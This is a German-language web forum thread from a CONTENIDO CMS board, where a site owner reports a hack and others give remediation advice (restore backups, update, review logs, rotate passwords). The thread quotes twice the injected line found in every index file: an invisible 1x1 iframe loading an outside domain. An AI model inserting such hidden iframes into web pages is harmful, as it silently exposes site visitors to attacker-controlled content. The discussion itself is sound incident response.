Hack: Fehlermeldung in jeder Index-Datei

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
Käferli
Beiträge: 196
Registriert: Mo 15. Mär 2004, 21:37
Kontaktdaten:
Kontaktdaten von Käferli

Hack: Fehlermeldung in jeder Index-Datei

Beitrag von Käferli » Di 1. Jul 2008, 15:06

Code: Alles auswählen


<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Das steht in jeder Index-Datei, hat jemand ne Ahnung, was das bedeutet,
und über welchen Weg das auf alle Server kommen konnte, bin nervlich am Ende... :cry:
nicht geantwortet, ich krieg echt Panik...
Nach oben
thoste87
Beiträge: 189
Registriert: Fr 27. Jun 2008, 12:57
Kontaktdaten:
Kontaktdaten von thoste87

Beitrag von thoste87 » Di 1. Jul 2008, 15:09

update auf version 4.8.6 - zuerst vom provider eine sicherung hochspielen lassen (der selbst hochspielen) dann updaten.

Lg
Nach oben
Käferli
Beiträge: 196
Registriert: Mo 15. Mär 2004, 21:37
Kontaktdaten:
Kontaktdaten von Käferli

Beitrag von Käferli » Di 1. Jul 2008, 15:16

Aber worauf weist das hin, das ist sogar in Projekten, die ohne Contenido laufen, ich kann das alles nicht einordnen...

Worüber läuft so ein Angriff? Ich kann ja nicht alles per Verzeichnisschutz sichern, dann siehts ja keiner mehr.
Nach oben
Oldperl
Beiträge: 4260
Registriert: Do 30. Jun 2005, 22:56
Wohnort: Eltmann, Unterfranken, Bayern
Kontaktdaten:
Kontaktdaten von Oldperl

Beitrag von Oldperl » Di 1. Jul 2008, 15:56

Hallo Käferli,

das weist darauf hin das da jemand einen Shellzugriff auf deinen Webserver bekommen hat, so das er alle Dateien ändern kann.
Das ist nur über eine kurzfristige Sperrung und über neu Aufsetzen des Web raus zu bekommen.
Wichtig und gut wäre, wenn man an die Serverlogs kommt, um zu schauen wann und wo der- oder diejenigen sich eingeklinkt haben.
Auch sollten alle Zugänge/Passwörter dann geändert werden, und so weiter...

Habe grade eine Nacht mit einem gehackten Server hinter mir :-(

Gruß aus Franken

Ortwin
ConLite 2.1, alternatives und stabiles Update von Contenido 4.8.x unter PHP 7.x - Download und Repo auf Gitport.de
phpBO Search Advanced - das Suchwort-Plugin für CONTENIDO 4.9
Mein Entwickler-Blog
Nach oben
Käferli
Beiträge: 196
Registriert: Mo 15. Mär 2004, 21:37
Kontaktdaten:
Kontaktdaten von Käferli

Beitrag von Käferli » Di 1. Jul 2008, 16:30

Gibt es eine automatisierte 300 Passwörter kommen bei mir mindestens zusammen...
Nach oben
Oldperl
Beiträge: 4260
Registriert: Do 30. Jun 2005, 22:56
Wohnort: Eltmann, Unterfranken, Bayern
Kontaktdaten:
Kontaktdaten von Oldperl

Beitrag von Oldperl » Di 1. Jul 2008, 16:56

Für Contenido ist mir da nichts bekannt. So was ließe sich aber proggen. Wichtig sind aber vor allem alle Serverpasswörter, vor allem DB und evtl. FTP. Und die für's Backend, außer man kommt übers Frontend an relevante Daten ran.

Gruß aus Franken

Ortwin
ConLite 2.1, alternatives und stabiles Update von Contenido 4.8.x unter PHP 7.x - Download und Repo auf Gitport.de
phpBO Search Advanced - das Suchwort-Plugin für CONTENIDO 4.9
Mein Entwickler-Blog
Nach oben
kloevekorn
Beiträge: 199
Registriert: Mo 31. Okt 2005, 15:26
Wohnort: Hamburg
Kontaktdaten:
Kontaktdaten von kloevekorn

Re: Hack: Fehlermeldung in jeder Index-Datei

Beitrag von kloevekorn » Do 17. Jul 2008, 11:47

Käferli hat geschrieben:

Code: Alles auswählen


<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Eine Suche in einer Suma deiner Wahl nach "iframe hack" oder auch nach
<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

ist erleuchtend.
Nach oben
Antworten

Zurück zu „Allgemeine Themen“